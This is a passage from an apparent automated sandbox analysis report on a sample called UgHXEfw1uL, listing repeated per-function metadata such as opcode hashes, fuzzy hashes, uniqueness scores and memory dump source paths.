                                          • API String ID: 2994545307-0
                                          • Opcode ID: a70ea71642458b5413a2662fe981a42b22a94eef043963a3c0d44955a68551e2
                                          • Instruction ID: 8e6f62efab687b26953ce41f3ac4c783a0b86f29c354be5d97f624575ae3049c
                                          • Opcode Fuzzy Hash: a70ea71642458b5413a2662fe981a42b22a94eef043963a3c0d44955a68551e2
                                          • Instruction Fuzzy Hash: 1A515A72600A05DFDB25EFA4C980EAAB3F9FF047A4F510429EA41D7261D738EE45EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 247aa9be351f844bc9c5fc540ed90fdcd540371a8f2d579d7b31d2c725744423
                                          • Instruction ID: 46b8b9ae1d813cbe88149d3e14b14d9f9234563cc88176c12b88d5652ea66ff4
                                          • Opcode Fuzzy Hash: 247aa9be351f844bc9c5fc540ed90fdcd540371a8f2d579d7b31d2c725744423
                                          • Instruction Fuzzy Hash: A75166B16083428FD750DF29C992A6BB7E5BFC8718F44492DF489C7250EB34E905EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction ID: 2ed9af51f95071b788cb2ccb2a835719b30ee718868d170e08ac24b93f912b28
                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                          • Instruction Fuzzy Hash: 0B519E71E0021AABDF15DF94C841BEEBBB5AF45754F044069ED01BB240E738EE45DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction ID: 025b014b0d17d408cc9f3cd01d767c810e9e9b5711d2199caa130c7561cbe34c
                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction Fuzzy Hash: 2C51DAB1D00219EFDF10DF90CC99BAEB778AF423A4F154655E51267191D7389E40F7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfe6e1089b273b281c7c7bf51bcf5b138e185d30c7cc1ec13de606cd54bbfd88
                                          • Instruction ID: 68dd1fe80d3a5f6beecc114b0b777a69e4ca36ae36743c9a9062d62e47b1341f
                                          • Opcode Fuzzy Hash: dfe6e1089b273b281c7c7bf51bcf5b138e185d30c7cc1ec13de606cd54bbfd88
                                          • Instruction Fuzzy Hash: AD41F571B016909BC624EB2BCD85B7BB79AAFC13B0F144519F81D87281DF34DC02E6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256bb4e803d10828dfba968527b99e6bf6c0c3706500ee46f3ac5a6229e03397
                                          • Instruction ID: 29b0614ff299066e5f316f5b2e9745a7ca04668dc524f5ffb27bbd94e50a44c0
                                          • Opcode Fuzzy Hash: 256bb4e803d10828dfba968527b99e6bf6c0c3706500ee46f3ac5a6229e03397
                                          • Instruction Fuzzy Hash: A651BDB2D00215DFCB20DFA8C8809AEBBF9FF49764B114529E555A7304DB79AD01DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca3f1629ba66b5e6f9472d6ad54fa098a9fb12804899f30dcbde6e7e4bf970fa
                                          • Instruction ID: aa0d338551817282d697c324417134e02ccd86ad619736e54005dc1952788349
                                          • Opcode Fuzzy Hash: ca3f1629ba66b5e6f9472d6ad54fa098a9fb12804899f30dcbde6e7e4bf970fa
                                          • Instruction Fuzzy Hash: 5541E632A402019BDB24EF659CA2FAA3764BB48719F05012DFE429B242D7BEAD14E751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction ID: 2b75bd9093ac00266c1c01c75415a9c8de89f431be7ba090d7b5d8e87108ddba
                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                          • Instruction Fuzzy Hash: A841E672A047569FC725CF25C980A6AB7A9FF80720B05463EF9128B241EB38FD18D791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aab626f893c5fc029255e277ba45a647d1755e62391880f3eaba2a4cd0384225
                                          • Instruction ID: 5bc2e1b6e2c6b597d140a6a15091a33e9b2b9293044206f430bc378a05a82526
                                          • Opcode Fuzzy Hash: aab626f893c5fc029255e277ba45a647d1755e62391880f3eaba2a4cd0384225
                                          • Instruction Fuzzy Hash: CD419C36D00219DBCB14DF98C840AEDB7B4BF48721F24816AEE15E7350EB359D49EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e44805c611d8331065e9676b67ef450aabec7d925eceb6ade94c3b79619d8e1
                                          • Instruction ID: 264eccd49c3b911297ed9d05ab7de6f3ccf8af1c90638adb22a24a44fb688210
                                          • Opcode Fuzzy Hash: 1e44805c611d8331065e9676b67ef450aabec7d925eceb6ade94c3b79619d8e1
                                          • Instruction Fuzzy Hash: 1841B5726043019FD724EF24C881A5BBBE5FF88324F144839EA56C7711DB39E848EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction ID: c9f7dcc4718d27af42b378d9abe1d03aea43ce96fd91ed26d2eb01bcbde04ed0
                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction Fuzzy Hash: D3514975E00619CFDB14CF99C480AAEF7B2FF84720F2881A9D815AB350D770AE42DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd3fa3a946471fde81449324309cf0239c2cb600663f0a38f4884214b8e46c27
                                          • Instruction ID: 9cb8ba66fb4a686affd53109772d08682aef68a17f8266b470071138926943f0
                                          • Opcode Fuzzy Hash: fd3fa3a946471fde81449324309cf0239c2cb600663f0a38f4884214b8e46c27
                                          • Instruction Fuzzy Hash: 49510471900126DBDB65DB64DC01BE8B7B1EF11324F1482A5E429E72D2DB79AD81EF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e393216b241529e98ecf72af5137d9652060fe762ab5bc0538debe5f748f9325
                                          • Instruction ID: 3a9f2183f74ce691515afa539c6c5bc209e06ab24f777160f621cdf3801605ff
                                          • Opcode Fuzzy Hash: e393216b241529e98ecf72af5137d9652060fe762ab5bc0538debe5f748f9325
                                          • Instruction Fuzzy Hash: 6141A572E402289BCB31DF64DD41BEE77B4EF49750F0141A6E908AB242DB78DE80DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction ID: 5b762e69358877deb1018cddeafa6deb336ca1a24efbf5076def38b648b9ca1b
                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction Fuzzy Hash: F641D875F00245ABDB14EF96CC81AAFB7BAAF84390F244069E809E7341DE74DD02D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82d1ae5d1df6b076f102f8358dee8e0e5a7966a22e96c8470661a952883e353d
                                          • Instruction ID: 9810e0dd9a81f2a7412f5c1bb9b1b4be0168f67189f2c10bc39a6913a39e4634
                                          • Opcode Fuzzy Hash: 82d1ae5d1df6b076f102f8358dee8e0e5a7966a22e96c8470661a952883e353d
                                          • Instruction Fuzzy Hash: BB41B3726007119FD725CF24D880A26B7F5FF49314B108A6EE54787B52EB35F885EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0b8bea03a549cfc7899db425798f042016a81d7a45f9d833e4c7a087c9542ad
                                          • Instruction ID: d4cd35e20831f118fe2bb771d8dc8897cd9798d4249904be335e8ec086bd7b69
                                          • Opcode Fuzzy Hash: a0b8bea03a549cfc7899db425798f042016a81d7a45f9d833e4c7a087c9542ad
                                          • Instruction Fuzzy Hash: 7341C532A80604CFCB20DF68D9557EE7BB0FF04360F1801AAD811AB3A5DB799D40EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2662ae52426d76417247dc31ad637d4cb068a0824c702821620be2e628a0ec1f
                                          • Instruction ID: 61add0bf157815e99c69421fb303fd579ed0db28545eb68d1416ac0090e3339c
                                          • Opcode Fuzzy Hash: 2662ae52426d76417247dc31ad637d4cb068a0824c702821620be2e628a0ec1f
                                          • Instruction Fuzzy Hash: D2410772901211CBC724DF58E841B9AB7B1FB84754F24812EE4019B356CB3DDD42EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f243e0009d2907ce6ff9e8af249bb57b7242a6c781e4463ba987986d557af2e
                                          • Instruction ID: 62f600dc601c6cda0049e5cf3cfae9792a81d57391239f3216d9b15a01fcb9e3
                                          • Opcode Fuzzy Hash: 9f243e0009d2907ce6ff9e8af249bb57b7242a6c781e4463ba987986d557af2e
                                          • Instruction Fuzzy Hash: 42419F325087069ED311DF64C941BABB7E8EF84B94F40092BF984D7250EB34DE45AB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction ID: aa7fb0e90cc01cc2ea56adca06ebb448de72d946ad533028c373d2c88aa76f6f
                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction Fuzzy Hash: E7412632E01211EBCB20DEA588407FAB761EF95B24F25C06BE8499B244D7358DC0FB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da4fbbc9e7a1e033c530a7f83ed12fd855d2a047c0dd6297a4ae4467fc996971
                                          • Instruction ID: 00e57ef950728e8959e7b4d1adc5fa179cff32c2477e88cf88e989c338405a3e
                                          • Opcode Fuzzy Hash: da4fbbc9e7a1e033c530a7f83ed12fd855d2a047c0dd6297a4ae4467fc996971
                                          • Instruction Fuzzy Hash: 0A417872A01710AFD321CF18D840B2AB7F4EF48724F64856AE4498B252EB79ED42DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction ID: 496e7348f430f9b562630c62e2fdf80a49991a93ad70435013a8b27dc93ca089
                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction Fuzzy Hash: 5F411B71A00605EFCB24CF98D980AAAB7F4FF18711B20496DEA56D7691D730EA48EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d380628c5ca25936a9c4dc4be19e4e5e3f3b0e2978e0c23ced50ba6ee8d8210
                                          • Instruction ID: 23f350fc44660564a8c852e96a66a20c89b8cd017cd92e5fce6df109bb6f767b
                                          • Opcode Fuzzy Hash: 0d380628c5ca25936a9c4dc4be19e4e5e3f3b0e2978e0c23ced50ba6ee8d8210
                                          • Instruction Fuzzy Hash: 8541E472905710EFCB61EF24ED01B59B7B1FF44320F10826AD8469B2A1DB789941EF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5714ccee1d8a23bf8d72f24ff3a5b518e4c7548612485c91709f4eaabc7f29e
                                          • Instruction ID: 9f68a7a2ebb5edc3a21c97757ccdc5916d14a246465b38bdab8fb3d8ccbd3dde
                                          • Opcode Fuzzy Hash: d5714ccee1d8a23bf8d72f24ff3a5b518e4c7548612485c91709f4eaabc7f29e
                                          • Instruction Fuzzy Hash: 14319AB1A00349DFDB11CF68C440799BBF0FF09725F2081AAE509DB251D7369906EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62092620529168d34f05ccf29d45c16c3bf73f1f1969bb65be63ca66ca1ce777
                                          • Instruction ID: e34b5c69fe079bb3fc21cdbfc524cf14a5a693577f140ae79ca0a34c4de3eecb
                                          • Opcode Fuzzy Hash: 62092620529168d34f05ccf29d45c16c3bf73f1f1969bb65be63ca66ca1ce777
                                          • Instruction Fuzzy Hash: 114183B19043019BD360DF24C845B9BBBE8FF88754F004A2AF598D7291DB789904DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e3cfc3eb6f6ab982b110aad02e9bcd71f0493218b8d747a606b9469cff405cb
                                          • Instruction ID: 257856f88963a04071d37c0d5e236d5cdd9e9941b65ba07d17b973367ca644ad
                                          • Opcode Fuzzy Hash: 0e3cfc3eb6f6ab982b110aad02e9bcd71f0493218b8d747a606b9469cff405cb
                                          • Instruction Fuzzy Hash: C041C2B2A086419FC320DF68E840A6AB3E9EFC9710F044629F89597680EB34ED14D7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 459d969ae3c0603fd38ac1f53d38da7209ecb145ff7be29810caadd9e2523580
                                          • Instruction ID: 20bff79d64098f4a11a73f7ac94368c3f685da770c2efbd6123dec977d9e5894
                                          • Opcode Fuzzy Hash: 459d969ae3c0603fd38ac1f53d38da7209ecb145ff7be29810caadd9e2523580
                                          • Instruction Fuzzy Hash: A641E431A003118BC725DF28E894B2BB7E9EF80760F14442DF9958B291DBB5ED81EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction ID: 3126b88ace38bfe5c8a5e48fe13ce611dae736eeaeee416e7a252f38d2d00a8d
                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                          • Instruction Fuzzy Hash: 75312832A05244AFDB119B68CC80BDEBBE9EF04760F1441B6F855D7352C678D984EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d166fdcfd5ba8308cf9ea7f19414d57975fc618c9ece8435c389c78aee0bf612
                                          • Instruction ID: d8104faed30acb36563a0cb704b4b62c888f09e08d21f5a1a0618b018fe5d28f
                                          • Opcode Fuzzy Hash: d166fdcfd5ba8308cf9ea7f19414d57975fc618c9ece8435c389c78aee0bf612
                                          • Instruction Fuzzy Hash: 4141DF31600B04DFC762DF24C885FE677E9BF49320F104829E5998B291CBB8EC44EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0bb0f3df6b8c31165ce953b6510af9da1229dcd4a2ec83f7fcc7bf8a4ad2298
                                          • Instruction ID: b62ea378d2e94529e5a9d9d7d159b24b239a8c6afacab82bad32a2f47f6f3e39
                                          • Opcode Fuzzy Hash: e0bb0f3df6b8c31165ce953b6510af9da1229dcd4a2ec83f7fcc7bf8a4ad2298
                                          • Instruction Fuzzy Hash: 1131D372B01685DBFB22DB59CD48B6577D8BF81B64F1D04B0AA859B6D2DB2CDC40E220
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a41cb5807ba6e354a7ad781eb97b0aa12389e8d8ec6f8a3642747d936ad92e90
                                          • Instruction ID: 890c77e1d4d0ba2b2252aa1eb21d9b6e447a014831ebca0fd1557e2c69a3e99e
                                          • Opcode Fuzzy Hash: a41cb5807ba6e354a7ad781eb97b0aa12389e8d8ec6f8a3642747d936ad92e90
                                          • Instruction Fuzzy Hash: 5731D076E00259ABDB15DF99CC41BAEB3B5EB48B90F414168E900EB284D774ED00DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26ccf2471401ec767e6e7f7868d3ec1c27e8a45b0ee5da2dfa01d1b114576934
                                          • Instruction ID: fdb9a627e108479cbd2a237945aa6eb4ce12eb795277e2b07d2a09e4a9dfc48d
                                          • Opcode Fuzzy Hash: 26ccf2471401ec767e6e7f7868d3ec1c27e8a45b0ee5da2dfa01d1b114576934
                                          • Instruction Fuzzy Hash: 4C317076A4113DABCB21DF54DD85FDEB7BAAB98350F1000A5B508A7250CA34EE919F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 243533b91d8224e35ae613d3cbbe1039faa2654a329d7133ba77a1f45ae2bb4e
                                          • Instruction ID: 0221a3e64d0f19a50a195af21783110121485d7865d9ec321832b726baa034eb
                                          • Opcode Fuzzy Hash: 243533b91d8224e35ae613d3cbbe1039faa2654a329d7133ba77a1f45ae2bb4e
                                          • Instruction Fuzzy Hash: 9531C472E00214AFDB21DFA9CC40BAEBBF9FF88760F114425F916E7251D6749E00AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 248c074f83a1b07176986520728bd8bcf73b9ada8594678ed472d3595b8da962
                                          • Instruction ID: 956ba2e28e9b3b6297054a0434b92efc780b7d06ee6d2b5d6537a94afd5b9699
                                          • Opcode Fuzzy Hash: 248c074f83a1b07176986520728bd8bcf73b9ada8594678ed472d3595b8da962
                                          • Instruction Fuzzy Hash: E6313832A00219EFC7129F9ACC40B6EB7B5AF547A0F00006DF501DB352DA38ED00A790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a30bb1d6c40f3b3ff222fa639329c90f684dc71fd847acfad966560bb337fd32
                                          • Instruction ID: 11ac2014205b21f197e5f7ecfa451f0ca33bba71e055588fee260e3162b085d4
                                          • Opcode Fuzzy Hash: a30bb1d6c40f3b3ff222fa639329c90f684dc71fd847acfad966560bb337fd32
                                          • Instruction Fuzzy Hash: B931D673A04621DBC712DE249840EAB7BA5EF94760F114529FC559B312DE34DC01B7D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
